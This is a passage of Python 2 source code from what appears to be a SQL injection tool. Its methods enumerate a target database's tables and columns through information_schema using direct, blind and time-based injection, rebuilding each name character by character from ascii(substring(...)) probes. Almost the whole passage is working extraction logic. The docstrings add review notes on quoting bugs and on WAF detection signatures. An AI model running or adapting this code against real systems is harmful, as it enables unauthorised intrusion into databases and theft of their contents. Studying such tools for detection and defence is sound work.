                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # 然后注 columns_number 的 length
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = build_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                lens=self.len,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns名字
                            # 清空column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))
                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = build_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    lens=self.len,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "time":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = time_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # 然后注 columns_number 的 length
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))
                            retVal = time_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                times=self.time,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns名字
                            # 清空column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = time_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    times=self.time,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                # 把注入得到的columns_name列表转为元组
                self.columns_name[database_name][table_name] = tuple(
                    columns_name)
        logger.info("Sqli result:")
        # 输出所有的列名
        for database_name in self.columns_name:
            tables_name = ""
            for table_name in self.columns_name[database_name]:
                tables_name += table_name
                tables_name += ','
                columns_name = ""
                for column_name in self.columns_name[database_name][
                        table_name]:
                    columns_name += column_name
                    columns_name += ','

                logger.info("Table %s has columns %s", table_name,
                            columns_name)
            logger.info("Database %s has tables %s", database_name,
                        tables_name)

        print "[*]Columns list:", self.columns_name
    def get_tables(self):
        """Enumerate the table names of every known database via information_schema.

        For each entry in ``self.databases_name`` (populated first through
        ``SqliDatabases.get_database`` when the list is empty) this stores
        ``self.tables_name[database_name] = tuple(<table names>)``.  The
        extraction strategy is chosen by ``self.sqlimethod``:

        * ``"normal"`` -- ``normal_injection`` returns the table count, each
          name length and each name directly.
        * ``"build"``  -- ``build_injection`` returns one value per request;
          the count and length are coerced with ``int`` and each name is
          rebuilt one character at a time from ``ascii(substring(...))``.
        * ``"time"``   -- same shape as ``"build"`` but via ``time_injection``
          with ``times=self.time``.

        Any other ``self.sqlimethod`` value matches no branch, so an empty
        tuple is stored for that database.  Side effects: one request per
        probe through ``self.sqlirequest``, debug/info logging, and a final
        Python 2 ``print`` of ``self.tables_name``.

        NOTE(review): ``database_name`` is spliced into the ``conditions``
        predicate unquoted, so a name containing a single quote would
        corrupt the generated predicate.  ``chr(retVal)`` only covers
        single-byte values, so multi-byte table names are not reconstructed
        faithfully.  From a defensive standpoint the repeated
        ``information_schema.tables`` / ``length(...)`` /
        ``ascii(substring(...))`` request sequence is a recognisable
        enumeration signature for WAF and database-audit rules.
        """

        # If databases_name has not been populated yet, enumerate databases first
        if len(self.databases_name) == 0:
            logger.debug("Set the parameters of the self.databases_name...")
            SqliDatabases.get_database(self)

        # Each database needs its own tables_name enumeration
        for database_name in self.databases_name:
            # Start enumerating this database's tables
            logger.debug("Start sqli databases %s's tables_name" % database_name)
            tables_name = []

            logger.debug("The sqlirequest is %s, start sqli tables..." % self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")
                # First obtain the number of tables (returned directly as a number)

                tables_number = normal_injection(select='COUNT(*)',
                                                 source="information_schema.tables",
                                                 conditions="table_schema = '" + database_name + "'",
                                                 dealpayload=self.dealpayload,
                                                 data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                 )

                logger.debug("Table account sqli success...The tables_number is %d..." % tables_number)
                print "[*] tables_number: %d" % tables_number

                # One iteration per table (trange progress bar is disabled here)
                for i in trange(int(tables_number), desc="Table sqli...", leave=False, disable=True):
                    # First the length of the i-th table name (limit=i selects the row)
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    table_name_len = normal_injection(select='length(`table_name`)',
                                                      source="information_schema.tables",
                                                      conditions="table_schema = '" + database_name + "'",
                                                      limit=i,
                                                      dealpayload=self.dealpayload,
                                                      data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                      )

                    logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))

                    # Then the table name itself, returned whole (isStrings=True)
                    logger.debug("Start %dth table name sqli..." % (i + 1))

                    table_name = normal_injection(select='`table_name`',
                                                  source='information_schema.tables',
                                                  conditions="table_schema = '" + database_name + "'", limit=i,
                                                  dealpayload=self.dealpayload,
                                                  data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                                  )

                    logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))

                    # Append table_name to the list
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")

                # build_injection hands back the raw value; coerce to int before looping
                retVal = build_injection(select="COUNT(`table_name`)",
                                         source="information_schema.tables",
                                         conditions="table_schema = '" + database_name + "'",
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                         isCount=True, sqlirequest=self.sqlirequest)
                tables_number = int(retVal)

                logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number)
                logger.info("[*] tables_number: %d" % tables_number)

                for i in range(0, int(tables_number)):
                    # Then the length of the i-th table name
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    retVal = build_injection(select="length(`table_name`)",
                                             source="information_schema.tables",
                                             conditions="table_schema = '" + database_name + "'",
                                             limit=i,
                                             dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                             isCount=True, sqlirequest=self.sqlirequest)
                    table_name_len = int(retVal)

                    logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))

                    # Then the table name, one character per request
                    # Reset table_name before accumulating
                    table_name = ""
                    logger.debug("Start %dth table sqli..." % (i + 1))

                    # substring() is 1-based, hence j + 1; retVal is the character's code point
                    for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False):
                        retVal = build_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))",
                                                 source="information_schema.tables",
                                                 conditions="table_schema = '" + database_name + "'",
                                                 limit=i,
                                                 dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                                 isStrings=True, sqlirequest=self.sqlirequest)
                        table_name += chr(retVal)

                    logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))

                    # Append table_name to the list
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")

                # Same flow as the "build" branch, but through time_injection
                retVal = time_injection(select="COUNT(`table_name`)",
                                        source="information_schema.tables",
                                        conditions="table_schema = '" + database_name + "'",
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                        isCount=True, sqlirequest=self.sqlirequest)
                tables_number = int(retVal)

                logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number)
                logger.info("[*] tables_number: %d" % tables_number)

                for i in range(0, int(tables_number)):
                    # Then the length of the i-th table name
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    retVal = time_injection(select="length(`table_name`)",
                                            source="information_schema.tables",
                                            conditions="table_schema = '" + database_name + "'",
                                            limit=i,
                                            dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                            isCount=True, sqlirequest=self.sqlirequest)
                    table_name_len = int(retVal)

                    logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))

                    # Then the table name, one character per request
                    # Reset table_name before accumulating
                    table_name = ""
                    logger.debug("Start %dth table sqli..." % (i + 1))

                    # substring() is 1-based, hence j + 1; retVal is the character's code point
                    for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False):
                        retVal = time_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))",
                                                source="information_schema.tables",
                                                conditions="table_schema = '" + database_name + "'",
                                                limit=i,
                                                dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                                isStrings=True, sqlirequest=self.sqlirequest)
                        table_name += chr(retVal)

                    logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))

                    # Append table_name to the list
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))

            # Freeze the collected names; an unmatched sqlimethod leaves this empty
            self.tables_name[database_name] = tuple(tables_name)

        print "[*] tables_name list: ", self.tables_name
    def get_columns(self):
        """Enumerate the column names of every known table via information_schema.

        For each database in ``self.tables_name`` (populated first through
        ``SqliTables.get_tables`` when it is empty) this resets
        ``self.columns_name[database_name]`` to a fresh dict and then stores
        ``self.columns_name[database_name][table_name] = tuple(<column names>)``
        for every table.  The extraction strategy is chosen by
        ``self.sqlimethod``:

        * ``"normal"`` -- ``normal_injection`` returns the column count, each
          name length and each name directly.
        * ``"build"``  -- ``build_injection`` returns one value per request;
          the count and length are coerced with ``int`` and each name is
          rebuilt one character at a time from ``ascii(substring(...))``.
        * ``"time"``   -- same shape as ``"build"`` but via ``time_injection``
          with ``times=self.time``.

        Any other ``self.sqlimethod`` value matches no branch, so an empty
        tuple is stored for that table.  Afterwards a summary is logged per
        table and per database (comma-terminated lists, trailing comma
        included) and ``self.columns_name`` is printed with a Python 2
        ``print`` statement.

        NOTE(review): ``table_name`` and ``database_name`` are spliced into
        the ``conditions`` predicate unquoted; a name containing a single
        quote would corrupt the generated predicate.  ``chr(retVal)`` only
        covers single-byte values, so multi-byte column names are not
        reconstructed faithfully.  From a defensive standpoint the repeated
        ``information_schema.columns`` / ``length(...)`` /
        ``ascii(substring(...))`` request sequence is a recognisable
        enumeration signature for WAF and database-audit rules.
        """

        # If tables_name has not been populated yet, enumerate tables first
        if len(self.tables_name) == 0:
            SqliTables.get_tables(self)

        # Iterate every database
        for database_name in self.tables_name:

            # Each database gets its own table -> columns dict (reset on every run)
            self.columns_name[database_name]={}

            # Each table needs its own columns_name enumeration
            for table_name in self.tables_name[database_name]:

                # Column names of this table are collected in a list
                columns_name = []

                # Start enumerating columns
                logger.debug("Start sqli databases %s's tables %s's columns..." % (database_name, table_name))

                logger.debug("The sqlirequest is %s, start sqli columns..." % self.sqlirequest)

                if self.sqlimethod == "normal":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table's %s column amount sqli..." % table_name)

                    # First obtain the number of columns (returned directly as a number)

                    columns_number = normal_injection(select='COUNT(*)',
                                                      source="information_schema.columns",
                                                      conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                                      dealpayload=self.dealpayload,
                                                      data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                      )

                    logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
                    logger.info("[*] columns_number: %d" % columns_number)

                    # One iteration per column (trange progress bar is disabled here)
                    for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True):
                        # First the length of the i-th column name (limit=i selects the row)
                        logger.debug("Start %dth column length sqli..." % (i + 1))

                        column_name_len = normal_injection(select='length(`column_name`)',
                                                           source="information_schema.columns",
                                                           conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                                           limit=i,
                                                           dealpayload=self.dealpayload,
                                                           data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                           )

                        logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
                        logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                        # Then the column name itself, returned whole (isStrings=True)

                        column_name = normal_injection(select='`column_name`',
                                                       source='information_schema.columns',
                                                       conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                                       limit=i,
                                                       dealpayload=self.dealpayload,
                                                       data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                                       )

                        logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                        # Append column_name to the list
                        columns_name.append(column_name)
                        logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

                elif self.sqlimethod == "build":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table's %s column amount sqli..." % table_name)

                    # build_injection hands back the raw value; coerce to int before looping
                    retVal = build_injection(select="COUNT(`column_name`)",
                                             source="information_schema.columns",
                                             conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                             dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                             isCount=True, sqlirequest=self.sqlirequest)
                    columns_number = int(retVal)

                    logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
                    logger.info("[*] columns_number: %d" % columns_number)

                    for i in range(0, int(columns_number)):
                        # Then the length of the i-th column name
                        logger.debug("Start %dth column length sqli..." % (i + 1))

                        retVal = build_injection(select="length(`column_name`)",
                                                 source="information_schema.columns",
                                                 conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                                 limit=i,
                                                 dealpayload=self.dealpayload, data=self.Data,
                                                 lens=self.len,
                                                 isCount=True, sqlirequest=self.sqlirequest)
                        column_name_len = int(retVal)

                        logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
                        logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                        # Then the column name, one character per request
                        # Reset column_name before accumulating
                        column_name = ""
                        logger.debug("Start %dth column sqli..." % (i + 1))

                        # substring() is 1-based, hence j + 1; retVal is the character's code point
                        for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
                            retVal = build_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))",
                                                     source="information_schema.columns",
                                                     conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                                     limit=i,
                                                     dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                                     isStrings=True, sqlirequest=self.sqlirequest)
                            column_name += chr(retVal)

                        logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                        # Append column_name to the list
                        columns_name.append(column_name)
                        logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

                elif self.sqlimethod == "time":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table's %s column amount sqli..." % table_name)

                    # Same flow as the "build" branch, but through time_injection
                    retVal = time_injection(select="COUNT(`column_name`)",
                                            source="information_schema.columns",
                                            conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                            dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                            isCount=True, sqlirequest=self.sqlirequest)
                    columns_number = int(retVal)

                    logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
                    logger.info("[*] columns_number: %d" % columns_number)

                    for i in range(0, int(columns_number)):
                        # Then the length of the i-th column name
                        logger.debug("Start %dth column length sqli..." % (i + 1))

                        retVal = time_injection(select="length(`column_name`)",
                                                source="information_schema.columns",
                                                conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                                limit=i,
                                                dealpayload=self.dealpayload, data=self.Data,
                                                times=self.time,
                                                isCount=True, sqlirequest=self.sqlirequest)
                        column_name_len = int(retVal)

                        logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
                        logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                        # Then the column name, one character per request
                        # Reset column_name before accumulating
                        column_name = ""
                        logger.debug("Start %dth column sqli..." % (i + 1))

                        # substring() is 1-based, hence j + 1; retVal is the character's code point
                        for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
                            retVal = time_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))",
                                                    source="information_schema.columns",
                                                    conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                                    limit=i,
                                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                                    isStrings=True, sqlirequest=self.sqlirequest)
                            column_name += chr(retVal)

                        logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                        # Append column_name to the list
                        columns_name.append(column_name)
                        logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

                # Freeze the collected column names; an unmatched sqlimethod leaves this empty
                self.columns_name[database_name][table_name] = tuple(columns_name)
        logger.info("Sqli result:")
        # Log every column name collected; the locals below are rebound as
        # comma-terminated summary strings (note the trailing comma)
        for database_name in self.columns_name:
            tables_name = ""
            for table_name in self.columns_name[database_name]:
                tables_name += table_name
                tables_name += ','
                columns_name = ""
                for column_name in self.columns_name[database_name][table_name]:
                    columns_name += column_name
                    columns_name += ','

                logger.info("Table %s has columns %s", table_name, columns_name)
            logger.info("Database %s has tables %s", database_name, tables_name)

        print "[*]Columns list:", self.columns_name